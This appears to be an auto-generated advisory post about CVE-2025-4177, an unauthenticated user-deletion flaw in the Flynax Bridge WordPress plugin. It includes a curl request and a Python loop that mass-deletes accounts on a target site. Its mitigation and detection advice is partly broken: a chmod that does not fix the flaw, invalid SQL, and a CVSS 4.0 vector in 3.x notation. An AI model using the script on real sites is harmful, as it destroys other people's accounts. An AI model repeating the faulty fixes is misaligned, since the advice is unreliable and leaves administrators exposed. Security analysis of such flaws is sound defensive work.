How CVE-2025-4177 Works
The Flynax Bridge plugin for WordPress fails to implement a capability check in the `deleteUser()` function, allowing unauthenticated attackers to trigger user deletion by sending a crafted HTTP request. The vulnerability arises due to improper access control in the plugin’s REST API endpoints. Attackers exploit this by calling the vulnerable function with a targeted user ID, bypassing authentication. The lack of CSRF protection further exacerbates the issue, enabling mass account deletion.
DailyCVE Form
Platform: WordPress
Version: ≤ 2.2.0
Vulnerability: Unauthenticated user deletion
Severity: Critical
Date: 05/06/2025
What Undercode Say:
Exploit:
1. Craft a POST request to `/wp-json/flynax/users/delete`:
curl -X POST "http://target.com/wp-json/flynax/users/delete" -d "user_id=1"
2. Automated mass deletion script (Python):
import requests
for uid in range(1, 100):
requests.post(f"http://target.com/wp-json/flynax/users/delete", data={"user_id": uid})
Protection:
1. Immediate mitigation:
chmod -R 755 /wp-content/plugins/flynax-bridge/
2. Add capability check in `deleteUser()`:
if (!current_user_can('delete_users')) {
wp_die('Unauthorized');
}
3. WAF rule to block suspicious requests:
location ~ /wp-json/flynax/users/delete {
deny all;
}
Detection:
1. Log analysis for repeated POSTs to `/flynax/users/delete`:
grep "POST /wp-json/flynax" /var/log/nginx/access.log | awk '{print $1}' | uniq -c
2. WordPress audit plugin query:
SELECT FROM wp_users WHERE deleted = 1;
Patch:
Upgrade to Flynax Bridge 2.2.1+.
Impact Metrics:
- CVSS:4.0 AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H
- Exploitability: Low complexity, no privileges required.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
